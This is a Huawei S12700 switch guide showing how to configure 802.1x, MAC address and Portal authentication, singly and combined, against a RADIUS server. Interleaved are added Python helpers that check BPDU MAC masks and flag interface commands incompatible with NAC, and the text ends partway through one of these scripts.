[Figure: employees in the office area connect through a LAN switch to GE1/0/1 (VLAN 10) of the Switch; GE1/0/2 (VLAN 20) connects to the network and the RADIUS server 192.168.2.30.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Enable 802.1x authentication to control network access rights of the employees in the
office.
3. Configure the user access mode to multi-authen and set the maximum number of access
users to 100, so the device can control the network access rights of each user
independently.


NOTE

Before configuring this example, ensure that devices can communicate with each other in the network.
In this example, the LAN switch exists between the access switch Switch and users. To ensure that users
can pass 802.1x authentication, you must configure the EAP packet transparent transmission function on
the LAN switch.
l Method 1: The S5700 is used as an example of the LAN switch. Perform the following operations:
1. Run the l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003
group-mac 0100-0000-0002 command in the system view of the LAN switch to configure the
LAN switch to transparently transmit EAP packets.
2. Run the l2protocol-tunnel user-defined-protocol 802.1x enable command on the interface
connecting to users and the interface connecting to the access switch to enable the Layer 2
protocol transparent transmission function.
l Method 2: This method is recommended when a large number of users exist or high network
performance is required.
1. Run the following commands in the system view:
l undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0
l bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
l bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
l bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
l bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8
2. (This step is mandatory when you switch from method 1 to method 2.) Run the undo
l2protocol-tunnel user-defined-protocol 802.1x enable command in the interface view to
delete the configuration of transparent transmission of 802.1x protocol packets.
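Why the four method 2 entries let EAPOL frames through while the single default entry does not, as an added Python example that is not part of the Huawei document: it enumerates which destination MAC addresses each bpdu mac-address set matches, assuming the usual bitwise semantics (an entry matches a frame when the masked destination address equals the masked base address).

```python
"""Added example (not from the Huawei document): which destination MACs does each
bpdu mac-address set on the LAN switch treat as BPDUs (i.e. not forward as user traffic)?

Assumption: an entry "bpdu mac-address BASE MASK" matches a frame when
(dst & MASK) == (BASE & MASK). This is the usual mask semantics; it is assumed
here, not quoted from the page."""

EAPOL_PAE_GROUP = "0180-c200-0003"   # 802.1x (EAPOL) destination address named on the page

# The entry that method 2 removes with "undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0".
DEFAULT_BPDU_ENTRIES = [("0180-c200-0000", "ffff-ffff-fff0")]

# The four entries method 2 adds in its place.
METHOD2_BPDU_ENTRIES = [
    ("0180-c200-0000", "FFFF-FFFF-FFFE"),
    ("0180-c200-0002", "FFFF-FFFF-FFFF"),
    ("0180-c200-0004", "FFFF-FFFF-FFFC"),
    ("0180-c200-0008", "FFFF-FFFF-FFF8"),
]


def mac_to_int(mac: str) -> int:
    """Parse Huawei-style xxxx-xxxx-xxxx notation (either case) into an integer."""
    digits = mac.replace("-", "").replace(":", "").replace(".", "")
    if len(digits) != 12:
        raise ValueError(f"bad MAC address: {mac!r}")
    return int(digits, 16)


def int_to_mac(value: int) -> str:
    """Format an integer as lowercase xxxx-xxxx-xxxx."""
    h = f"{value:012x}"
    return f"{h[0:4]}-{h[4:8]}-{h[8:12]}"


def is_bpdu(dst_mac: str, entries) -> bool:
    """True if any (base, mask) entry matches the destination MAC."""
    dst = mac_to_int(dst_mac)
    for base, mask in entries:
        m = mac_to_int(mask)
        if dst & m == mac_to_int(base) & m:
            return True
    return False


def covered_range(entries, start="0180-c200-0000", end="0180-c200-000f"):
    """List the MACs in [start, end] that at least one entry matches."""
    lo, hi = mac_to_int(start), mac_to_int(end)
    return [int_to_mac(v) for v in range(lo, hi + 1) if is_bpdu(int_to_mac(v), entries)]


if __name__ == "__main__":
    for name, entries in (("default entry", DEFAULT_BPDU_ENTRIES),
                          ("method 2 entries", METHOD2_BPDU_ENTRIES)):
        print(f"{name}: EAPOL {EAPOL_PAE_GROUP} treated as BPDU? {is_bpdu(EAPOL_PAE_GROUP, entries)}")
        print("  matched in 0180-c200-0000..000f:", ", ".join(covered_range(entries)))
```

The default entry covers all sixteen addresses 0180-c200-0000 to 0180-c200-000f, so EAPOL frames are intercepted as BPDUs; the four method 2 entries cover the same range except 0180-c200-0003, which is why 802.1x packets then pass through the LAN switch.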

Procedure
Step 1 Create VLANs and configure the VLANs allowed by the interface to ensure network
communication.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# On the Switch, configure the interface GE1/0/1 connected to users as an access interface
and add the interface to VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

NOTE

Configure the interface type and VLANs based on the site requirements. In this example, users are
added to VLAN 10.

# On the Switch, configure the interface GE1/0/2 connected to the RADIUS server as an
access interface and add the interface to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.


# Create and configure the RADIUS server template rd1.


[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create an AAA authentication scheme abc and configure the authentication mode to
RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create an authentication domain isp1, and bind the AAA scheme abc and RADIUS server
template rd1 to the domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit

# Configure isp1 as the global default domain. During access authentication, enter a user
name in the format user@isp1 to perform AAA authentication in the domain isp1. If the user
name does not contain the domain name or contains an invalid domain name, the user is
authenticated in the default domain.
[Switch] domain isp1

Step 3 Configure 802.1x authentication on the Switch.


# Switch the NAC mode to unified mode.
[Switch] authentication unified-mode

NOTE

After switching between common mode and unified mode, you must save the configuration and restart the
device for each function in the new configuration mode to take effect.

# Enable 802.1x authentication on the interface GE1/0/1.


[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] authentication dot1x
[Switch-GigabitEthernet1/0/1] authentication mode multi-authen max-user 100
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.


1. Run the display dot1x command to check the 802.1x authentication configuration. The
command output (802.1x protocol is Enabled) shows that the 802.1x authentication has
been enabled on the interface GE1/0/1.
2. The user starts the 802.1x client on the terminal, and enters the user name and password
for authentication.
3. If the user name and password are correct, an authentication success message is
displayed on the client page. The user can access the network.
4. After the user goes online, you can run the display access-user access-type dot1x
command on the device to check the online 802.1x user information.
----End

Configuration Files
Configuration file of the Switch


#
sysname Switch
#
vlan batch 10 20
#
domain isp1
#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^%#
radius-server authentication 192.168.2.30 1812 weight 80
#
aaa
authentication-scheme abc
authentication-mode radius
domain isp1
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
authentication dot1x
authentication mode multi-authen max-user 100
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return

Related Content
Videos

Configure 802.1x Authentication

10.3.2 Example for Configuring MAC Address Authentication to Control Internal User Access

MAC Address Authentication Overview


As one of the NAC authentication modes, MAC address authentication controls a user's network
access rights based on the user's interface and MAC address. The user does not need to install
any client software. MAC address authentication ensures security of enterprise intranets.

In MAC address authentication, client software does not need to be installed on user
terminals, but MAC addresses must be registered on servers, resulting in complex
management. The other two NAC authentication methods have their own advantages and
disadvantages: 802.1x authentication ensures high security, but it requires that 802.1x client
software be installed on user terminals, causing inflexible network deployment. Portal
authentication also does not require client software installation and provides flexible
deployment, but it has low security.

MAC address authentication is applied to access authentication scenarios of dumb terminals
such as printers and fax machines.

Configuration Notes
l This example applies to all S12700 versions.


l NOTE
To know details about software mappings, see Switch Software Mapping Search.
l The mac-authen command cannot be used together with the following commands on the
same interface.
Command | Function
mac-limit | Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable | Disables MAC address learning on an interface.
port link-type dot1q-tunnel | Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan / port vlan-mapping vlan inner-vlan | Configures VLAN mapping on an interface.
port vlan-stacking | Configures selective QinQ.
port-security enable | Enables interface security.
mac-vlan enable | Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable | Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
As shown in Figure 10-29, the terminals in the physical access control department are
connected to the company's internal network through the Switch. Unauthorized access to the
internal network can damage the company's service system and cause leakage of key
information assets. Therefore, the administrator requires that the Switch should control the
users' network access rights to ensure internal network security.


Figure 10-29 Configuring MAC address authentication to control internal user access
[Figure: printers in the physical access control department connect through a LAN switch to GE1/0/1 (VLAN 10) of the Switch; GE1/0/2 (VLAN 20) connects to the network and the RADIUS server 192.168.2.30.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Enable MAC address authentication so that the Switch can control network access rights
of the dumb terminals in the physical access control department.
3. Configure the user access mode to multi-authen and set the maximum number of access
users to 100, so the device can control the network access rights of each user
independently.
NOTE

Before configuring this example, ensure that devices can communicate with each other in the network.

Procedure
Step 1 Create VLANs and configure the VLANs allowed by the interface to ensure network
communication.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# On the Switch, configure the interface GE1/0/1 connected to users as an access interface
and add the interface to VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

NOTE

Configure the interface type and VLANs based on the site requirements. In this example, users are
added to VLAN 10.


# On the Switch, configure the interface GE1/0/2 connected to the RADIUS server as an
access interface and add the interface to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.
# Create and configure the RADIUS server template rd1.
[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create an AAA authentication scheme abc and configure the authentication mode to
RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create an authentication domain isp1, and bind the AAA scheme abc and RADIUS server
template rd1 to the domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit

# Configure isp1 as the global default domain. During access authentication, enter a user
name in the format user@isp1 to perform AAA authentication in the domain isp1. If the user
name does not contain the domain name or contains an invalid domain name, the user is
authenticated in the default domain.
[Switch] domain isp1

Step 3 Configure MAC address authentication on the Switch.


# Switch the NAC mode to unified mode.
[Switch] authentication unified-mode

NOTE

After switching between common mode and unified mode, you must save the configuration and restart the
device for each function in the new configuration mode to take effect.

# Enable MAC address authentication on the interface GE1/0/1.


[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] authentication mac-authen
[Switch-GigabitEthernet1/0/1] authentication mode multi-authen max-user 100
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.


1. Run the display mac-authen command to check the MAC address authentication
configuration. The command output (MAC address authentication is enabled) shows
that MAC address authentication has been enabled on the interface GE1/0/1.
2. After the user starts the terminal, the device automatically obtains the terminal MAC
address and uses it as the user name and password for authentication.


3. The user can access the network after the authentication succeeds.
4. After the user goes online, you can run the display access-user access-type mac-authen
command on the device to check the online MAC address authentication user
information.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
domain isp1
#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^%#
radius-server authentication 192.168.2.30 1812 weight 80
#
aaa
authentication-scheme abc
authentication-mode radius
domain isp1
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
authentication mac-authen
authentication mode multi-authen max-user 100
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return
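An audit of a saved configuration file against the tables of commands that cannot coexist with 802.1x or MAC address authentication on one interface (the Configuration Notes of 10.3.1 and 10.3.2), as an added Python example that is not Huawei's code. The configuration text it parses is constructed for the example and follows the '#'-delimited layout of the Configuration Files sections above; the mac-limit maximum and port-security enable lines on GE1/0/3 are constructed conflicts, not part of the page's configuration.

```python
"""Added example (not Huawei's code): find interfaces in a saved S12700 configuration
that enable 802.1x or MAC address authentication together with a command the
Configuration Notes tables say cannot be used on the same interface."""

from typing import Dict, List

# Commands the tables list as incompatible with authentication dot1x / mac-authen on
# the same interface; matched by prefix on the saved-configuration line.
CONFLICTING_PREFIXES = (
    "mac-limit",
    "mac-address learning disable",
    "port link-type dot1q-tunnel",
    "port vlan-mapping vlan",      # covers both the map-vlan and inner-vlan forms
    "port vlan-stacking",
    "port-security enable",
    "mac-vlan enable",
    "ip-subnet-vlan enable",
)
# The two unified-mode NAC commands the tables apply to.
NAC_COMMANDS = ("authentication dot1x", "authentication mac-authen")


def parse_sections(config: str) -> List[List[str]]:
    """Split a saved configuration into its '#'-delimited sections (stripped lines)."""
    sections, current = [], []
    for raw in config.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "#":
            if current:
                sections.append(current)
            current = []
        elif line != "return":
            current.append(line)
    if current:
        sections.append(current)
    return sections


def interface_blocks(config: str) -> Dict[str, List[str]]:
    """Map each interface name to the sub-commands configured under it."""
    blocks = {}
    for section in parse_sections(config):
        head = section[0]
        if head.startswith("interface "):
            blocks[head[len("interface "):]] = section[1:]
    return blocks


def find_conflicts(config: str) -> Dict[str, List[str]]:
    """Return {interface: [conflicting lines]} for interfaces that enable NAC."""
    conflicts = {}
    for name, cmds in interface_blocks(config).items():
        if not any(c.startswith(NAC_COMMANDS) for c in cmds):
            continue          # no 802.1x / MAC authentication here, nothing to check
        bad = [c for c in cmds if c.startswith(CONFLICTING_PREFIXES)]
        if bad:
            conflicts[name] = bad
    return conflicts


# Constructed sample: GE1/0/1 as on this page, GE1/0/2 without NAC (so its mac-limit
# is allowed), and GE1/0/3 where MAC authentication coexists with two listed commands.
SAMPLE_CONFIG = """\
#
sysname Switch
#
vlan batch 10 20
#
interface GigabitEthernet1/0/1
 port link-type access
 port default vlan 10
 authentication dot1x
 authentication mode multi-authen max-user 100
#
interface GigabitEthernet1/0/2
 port link-type access
 port default vlan 20
 mac-limit maximum 50
#
interface GigabitEthernet1/0/3
 port link-type access
 port default vlan 10
 port-security enable
 mac-limit maximum 10
 authentication mac-authen
#
return
"""

if __name__ == "__main__":
    for intf, lines in find_conflicts(SAMPLE_CONFIG).items():
        print(f"{intf}: NAC enabled alongside {lines}")
```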

10.3.3 Example for Configuring Portal Authentication to Control Internal User Access

Portal Authentication Overview


As one of NAC authentication modes, Portal authentication is also called web authentication.
Generally, Portal authentication websites are also called Portal websites. When users go
online, they must be authenticated on Portal websites. The users can use network resources
only after they pass the authentication.

Portal authentication cannot ensure high security, but it does not require client software
installation and provides flexible deployment. The other two NAC authentication methods have
their own advantages and disadvantages: 802.1x authentication ensures high security, but it
requires that 802.1x client software be installed on user terminals, causing inflexible network
deployment. MAC address authentication does not require client software installation, but
MAC addresses must be registered on an authentication server, resulting in complex
management.


Portal authentication is applied to scenarios where a large number of scattered users such as
company visitors move frequently.

Configuration Notes
l This example applies to all S12700 versions.
l NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 10-30, the terminals in the visitor area are connected to the company's
internal network through the Switch. Unauthorized access to the internal network can damage
the company's service system and cause leakage of key information assets. Therefore, the
administrator requires that the Switch should control the users' network access rights to ensure
internal network security.

Figure 10-30 Configuring Portal authentication to control internal user access
[Figure: visitors in the visitor area connect through a LAN switch to GE1/0/1 (VLAN 10) of the Switch; GE1/0/2 (VLAN 20) connects to the network, the RADIUS server 192.168.2.30 and the Portal server 192.168.2.20.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Enable Portal authentication so that the Switch can control network access rights of the
visitors in the visitor areas.
3. Configure a Portal server template so that the device can communicate with the Portal
server.
NOTE

Before configuring this example, ensure that devices can communicate with each other in the network.

Procedure
Step 1 Create VLANs and configure the VLANs allowed by the interface to ensure network
communication.


# Create VLAN 10 and VLAN 20.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# On the Switch, configure the interface GE1/0/1 connected to users as an access interface
and add the interface to VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

NOTE

Configure the interface type and VLANs based on the site requirements. In this example, users are
added to VLAN 10.

# On the Switch, configure the interface GE1/0/2 connected to the RADIUS server as an
access interface and add the interface to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.

# Create and configure the RADIUS server template rd1.


[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create an AAA authentication scheme abc and configure the authentication mode to
RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create an authentication domain isp1, and bind the AAA scheme abc and RADIUS server
template rd1 to the domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit

# Configure isp1 as the global default domain. During access authentication, enter a user
name in the format user@isp1 to perform AAA authentication in the domain isp1. If the user
name does not contain the domain name or contains an invalid domain name, the user is
authenticated in the default domain.
[Switch] domain isp1

Step 3 Configure Portal authentication on the Switch.

# Switch the NAC mode to unified mode.


[Switch] authentication unified-mode


NOTE

After switching between common mode and unified mode, you must save the configuration and restart the
device for each function in the new configuration mode to take effect.

# Enable Portal authentication on the interface GE1/0/1.


[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] authentication portal
[Switch-GigabitEthernet1/0/1] authentication mode multi-authen max-user 100
[Switch-GigabitEthernet1/0/1] quit

# Create and configure a Portal server template abc.


[Switch] web-auth-server abc
[Switch-web-auth-server-abc] server-ip 192.168.2.20
[Switch-web-auth-server-abc] port 50200
[Switch-web-auth-server-abc] url http://192.168.2.20:8080/webagent
[Switch-web-auth-server-abc] shared-key cipher Huawei@123
[Switch-web-auth-server-abc] quit

NOTE

Ensure that the port number configured on the device is the same as that used by the Portal server.

# Bind the Portal server template abc to the interface GE1/0/1.


[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] web-auth-server abc direct
[Switch-GigabitEthernet1/0/1] quit

NOTE

In this example, users are allocated static IP addresses. If the users obtain IP addresses through DHCP and the
DHCP server is upstream connected to Switch, use the authentication free-rule command to create
authentication-free rules and ensure that the DHCP server is included in the authentication-free rules.
In addition, if the URL of Portal server needs to be analyzed by DNS and the DNS server is upstream
connected to Switch, you also need to create authentication-free rules and ensure that the DNS server is
included in the authentication-free rules.

Step 4 Verify the configuration.


1. Run the display portal and display web-auth-server configuration commands to
check the Portal authentication configuration. The command output (web-auth-server
layer2(direct)) shows that the Portal server template has been bound to the interface
GE1/0/1.
2. After starting the browser and entering any network address, the user is redirected to the
Portal authentication page. The user then enters the user name and password for
authentication.
3. If the user name and password are correct, an authentication success message is
displayed on the Portal authentication page. The user can access the network.
4. After the user goes online, you can run the display access-user access-type portal
command on the device to check the online Portal authentication user information.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
domain isp1


#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^%#
radius-server authentication 192.168.2.30 1812 weight 80
#
web-auth-server abc
server-ip 192.168.2.20
port 50200
shared-key cipher %^%#t:hJ@gD7<+G&,"Y}Y[VP4\foQ&og/Gg(,J4#\!gD%^%#
url http://192.168.2.20:8080/webagent
#
aaa
authentication-scheme abc
authentication-mode radius
domain isp1
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
authentication portal
authentication mode multi-authen max-user 100
web-auth-server abc direct
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return

10.3.4 Example for Configuring Multiple Authentication Modes to Control Internal User Access
Overview of Multiple Authentication Modes
In NAC network deployment, to provide flexible authentication, the device supports
concurrent deployment of 802.1x authentication, MAC address authentication, and Portal
authentication on the interfaces connected to users. In this case, the users can access the
network using any authentication mode.
If multiple authentication modes are enabled, they take effect in the sequence in which they are
configured. In addition, once multiple authentication modes are deployed, users are by default
authenticated in whichever mode applies to them, and the device assigns network rights according
to the mode in which each user was authenticated.

Configuration Notes
l This example applies to all S12700 versions.
l NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 10-31, the terminals in a company are connected to the company's
internal network through the Switch. Unauthorized access to the internal network can damage
the company's service system and cause leakage of key information assets. Therefore, the
administrator requires that the Switch should control the users' network access rights to ensure
internal network security.

Figure 10-31 Configuring multiple authentication modes to control internal user access

[Figure: Users and a Printer connect through a LAN Switch to GE1/0/1 (VLAN 10) of the Switch; GE1/0/2 (VLAN 20) leads to the Network, the RADIUS Server 192.168.2.30 and the Portal Server 192.168.2.20.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Enable 802.1x authentication, MAC address authentication, and Portal authentication so
that the Switch can control network access rights of the internal employees, dumb
terminals, and visitors. In addition, configure 802.1x authentication to take precedence
because there are more employees than dumb terminals and visitors.
3. Configure the user access mode to multi-authen and set the maximum number of access
users to 100, so the device can control the network access rights of each user
independently.
4. Configure a Portal server template so that the device can communicate with the Portal
server.

NOTE

Before configuring this example, ensure that devices can communicate with each other in the network.

Procedure
Step 1 Create VLANs and configure the VLANs allowed by the interface to ensure network
communication.

# Create VLAN 10 and VLAN 20.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# On the Switch, configure the interface GE1/0/1 connected to users as an access interface
and add the interface to VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

NOTE

Configure the interface type and VLANs based on the site requirements. In this example, users are
added to VLAN 10.

# On the Switch, configure the interface GE1/0/2 connected to the RADIUS server as an
access interface and add the interface to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.
# Create and configure the RADIUS server template rd1.
[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create an AAA authentication scheme abc and configure the authentication mode to
RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create an authentication domain isp1, and bind the AAA scheme abc and RADIUS server
template rd1 to the domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit

# Configure isp1 as the global default domain. During access authentication, enter a user
name in the format user@isp1 to perform AAA authentication in the domain isp1. If the user
name does not contain the domain name or contains an invalid domain name, the user is
authenticated in the default domain.
[Switch] domain isp1

Step 3 Configure 802.1x authentication, MAC address authentication, and Portal authentication on
the Switch.
# Switch the NAC mode to unified mode.
[Switch] authentication unified-mode

NOTE

After switching between the common mode and the unified mode, you must save the configuration and
restart the device for the functions of the new mode to take effect.

# Enable 802.1x authentication, MAC address authentication, and Portal authentication on the
interface GE1/0/1.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] authentication dot1x mac-authen portal
[Switch-GigabitEthernet1/0/1] authentication mode multi-authen max-user 100
[Switch-GigabitEthernet1/0/1] quit

# Create and configure a Portal server template abc.

[Switch] web-auth-server abc
[Switch-web-auth-server-abc] server-ip 192.168.2.20
[Switch-web-auth-server-abc] port 50200
[Switch-web-auth-server-abc] url http://192.168.2.20:8080/webagent
[Switch-web-auth-server-abc] shared-key cipher Huawei@123
[Switch-web-auth-server-abc] quit

NOTE

Ensure that the port number configured on the device is the same as that used by the Portal server.

# Bind the Portal server template abc to the interface GE1/0/1.


[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] web-auth-server abc direct
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.


1. Run the display dot1x, display mac-authen, display portal, and display web-auth-
server configuration commands. The command output shows that 802.1x
authentication, MAC address authentication, and Portal authentication have been enabled
on the interface GE1/0/1.
2. The user can access the network after passing 802.1x authentication, MAC address
authentication, or Portal authentication.
3. After the user goes online, you can run the display access-user interface
gigabitethernet1/0/1 command on the device to check all online user information.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
domain isp1
#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^
%#
radius-server authentication 192.168.2.30 1812 weight 80
#
web-auth-server abc
server-ip 192.168.2.20
port 50200
shared-key cipher %^%#t:hJ@gD7<+G&,"Y}Y[VP4\foQ&og/Gg(,J4#\!gD%^
%#
url http://192.168.2.20:8080/webagent
#
aaa
authentication-scheme abc
authentication-mode radius
domain isp1
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
authentication dot1x mac-authen portal
authentication mode multi-authen max-user 100
web-auth-server abc direct
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return

10.4 Typical NAC Configuration (Unified Mode) (V200R007C20, V200R009C00 and Later Versions)

10.4.1 Example for Configuring 802.1x Authentication to Control Internal User Access

802.1x Authentication Overview


802.1x is a port-based network access control protocol, and 802.1x authentication is one of the
NAC authentication modes. It protects the security of enterprise intranets.

802.1x authentication provides high security; however, it requires 802.1x client software to be
installed on user terminals, which makes network deployment less flexible. The other two NAC
authentication methods have their own advantages and disadvantages: MAC address authentication
does not require client software, but MAC addresses must be registered on an authentication
server. Portal authentication also does not require client software and offers flexible
deployment, but it provides lower security.

As a result, 802.1x authentication is suited to newly built networks with centralized users and
strict information security requirements.

Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.
l NOTE
To know details about software mappings, see Switch Software Mapping Search.
l After enabling NAC on an interface, you cannot run the following commands on the
interface. Similarly, after running the following commands on an interface, you cannot
enable NAC on the interface.
Command                             Function
mac-limit                           Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable        Disables MAC address learning on an interface.
port link-type dot1q-tunnel         Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan     Configures VLAN mapping on an interface.
port vlan-mapping vlan inner-vlan
port vlan-stacking                  Configures selective QinQ.
port-security enable                Enables interface security.
mac-vlan enable                     Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable               Enables IP subnet-based VLAN assignment on an interface.
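A configuration check that applies the table above, as an added example and not Huawei tooling: it parses the plain-text configuration file format shown in the Configuration Files sections of this page (views separated by lines holding only "#", interface views introduced by "interface <name>") and reports every interface on which NAC is enabled, by an authentication-profile binding or by "authentication dot1x|mac-authen|portal", together with one of the commands the table says cannot coexist with it. The sample configuration is constructed: GigabitEthernet1/0/1 is as on this page, while the "mac-limit maximum 50" line on GigabitEthernet1/0/2 and the whole GigabitEthernet1/0/3 are hypothetical.

```python
"""Flag interfaces whose configuration mixes NAC with commands that cannot coexist with it.

Added example, not Huawei tooling: it reads the plain-text configuration file
format shown in the Configuration Files sections of this page.
"""
import re

# The commands the Configuration Notes table lists as mutually exclusive with NAC
# on an interface, as regexes matched against a stripped interface-view line.
NAC_INCOMPATIBLE = {
    "mac-limit": r"^mac-limit\b",
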